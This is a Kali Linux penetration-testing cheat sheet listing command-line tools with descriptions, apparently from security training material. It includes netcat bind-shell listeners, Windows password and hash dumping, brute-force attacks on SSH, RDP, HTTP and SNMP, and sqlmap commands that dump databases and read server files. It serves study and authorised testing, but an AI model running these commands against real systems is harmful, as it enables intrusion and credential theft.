Kali Linux Commands Cheat Sheet
Linux skills
Oregon State University (OSU)
2 pag.
Document shared on [Link]
Downloaded by: 1C3_8R34K3R (monoliticstone@[Link])
Kali Linux Cheat Sheet by A. Wong
Basic Command
COMMAND    DESCRIPTION
grep "substring" target-file    Extract the lines that contain "substring"
grep -o "regex" target-file    Same as above, with a regular expression as input
cut -d "/" -f 3    Split the string by "/" and output the third column
sort -u    Remove duplicates
host "hostname"    Return the IP address of the host name
wc -l [Link]    Count the number of lines in "[Link]"
uniq -c    Prefix each line with its number of occurrences
cat [Link] | cut -d " " -f 1 | sort | uniq -c | sort -urn    Count the number of occurrences and sort in reverse order

Netcat / ncat
COMMAND    DESCRIPTION
nc -nv target port    Connect to a specific port of the target machine
nc -nlvp port -e filename    Listen on a specific port and execute the program after connect
ncat --exec [Link] --allow [Link] -vnl 4444 --ssl    Listen on port 4444, allow only [Link] to connect, execute [Link] after connect, encrypt with SSL
ncat -v [Link] 4444 --ssl    Connect to target at port 4444, encrypt with SSL

NMAP
COMMAND    DESCRIPTION
nmap -v -sS -A -T4 target    Nmap verbose scan, runs SYN stealth, T4 timing (should be OK on LAN), OS and service version info, traceroute and scripts against services
nmap -v -sS -p- -A -T4 target    As above but scans all TCP ports (takes a lot longer)
nmap -v -sU -sS -p- -A -T4 target    As above but scans all TCP ports and UDP scan (takes even longer)
nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 192.168.1.X    Nmap script to scan for vulnerable SMB servers. WARNING: unsafe=1 may cause knockover
ls /usr/share/nmap/scripts/* | grep ftp    Search nmap scripts for keywords

Mount File Shares
COMMAND    DESCRIPTION
mount [Link]:/vol/share /mnt/nfs    Mount NFS share to /mnt/nfs
mount -t cifs -o username=user,password=pass,domain=blah //192.168.1.X/share-name /mnt/cifs    Mount Windows CIFS / SMB share on Linux at /mnt/cifs. If you remove password, it will prompt on the CLI (more secure, as it won't end up in bash_history)
net use Z: \\win-server\share password /user:domain\janedoe /savecred /p:no    Mount a Windows share on Windows from the command line

SNMP Enumeration
COMMAND    DESCRIPTION
snmpcheck -t 192.168.1.X -c public    SNMP enumeration
snmpwalk -c public -v1 192.168.1.X 1| grep hrSWRunName|cut -d* * -f    SNMP enumeration
snmpenum -t 192.168.1.X    SNMP enumeration
onesixtyone -c names -i hosts    SNMP enumeration

DNS Enumeration & Transfer
COMMAND    DESCRIPTION
dnsrecon -d [Link] -t axfr    Enumerate and attempt to transfer target domain
dnsenum [Link]    Enumerate and attempt to transfer target domain

SMB Enumeration
COMMAND    DESCRIPTION
nbtscan [Link]/24    Discover Windows / Samba servers on subnet, finds Windows MAC addresses, NetBIOS name and discover client workgroup / domain
enum4linux -a target-ip    Do everything, runs all options (find Windows client domain / workgroup) apart from dictionary-based share name guessing

HTTP Enumeration
COMMAND    DESCRIPTION
nikto -h [Link]    Perform a nikto scan against target
dirbuster    Configure via GUI, CLI input doesn’t work most of the time
Packet Inspection
COMMAND    DESCRIPTION
tcpdump tcp port 80 -w [Link] -i eth0    tcpdump for port 80 on interface eth0, outputs to [Link]
Wireshark    GUI tool that performs packet inspection

Password Generation
COMMAND    DESCRIPTION
/usr/share/wordlists/    Kali password list
crunch 6 6 0123456789ABCDEF -o [Link]    Generate password list with only 0-9, A-F characters, length = 6, output to [Link]
crunch 4 4 -f /usr/share/crunch/[Link] mixalpha    Generate password list with specific character set, length = 4
cewl [Link] -m 6 -w [Link]    Generate password list from megacorpone website and output to [Link]
nano /etc/john/[Link]; john --wordlist=[Link] --rules --stdout > [Link]    Mutate passwords according to the rules

Password Cracking
COMMAND    DESCRIPTION
[Link]    Dump Windows password hash
wce -w    Dump the Windows clear text password
medusa -h [Link] -u admin -P [Link] -M http -m DIR:/admin -T 10    HTTP Bruteforce
ncrack -vv --user offsec -P password-[Link] rdp://[Link]    RDP Bruteforce
hydra -P [Link] -v [Link] snmp    SNMP Bruteforce
hydra -l root -P [Link] [Link] ssh    SSH Bruteforce

Port Forward
COMMAND    DESCRIPTION
ssh <gateway> -L <local port to listen>:<remote host>:<remote port>    Local port forward. [Link]:<port> is now redirected to the remote host
ssh <gateway> -R <remote port to bind>:<local host>:<local port>    Remote port forward. Access [Link]:<port> now to connect to the remote host at the remote bound port
ssh -D <local proxy port> -p <remote port> <target>    Dynamic port forward. We have now created a SOCKS proxy on the local machine.

SQL Map
COMMAND    DESCRIPTION
sqlmap -u [Link] --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3    Automated sqlmap scan
sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/[Link]"    Targeted sqlmap scan
sqlmap -u "[Link]" --dbms=mysql --tech=U --random-agent --dump    Scan URL for union + error based injection with MySQL backend and use a random user agent + database dump
sqlmap -o -u "[Link]" --forms    sqlmap check form for injection
sqlmap -o -u "[Link]" --forms -D database-name -T users --dump    sqlmap dump and crack hashes for table users on database-name.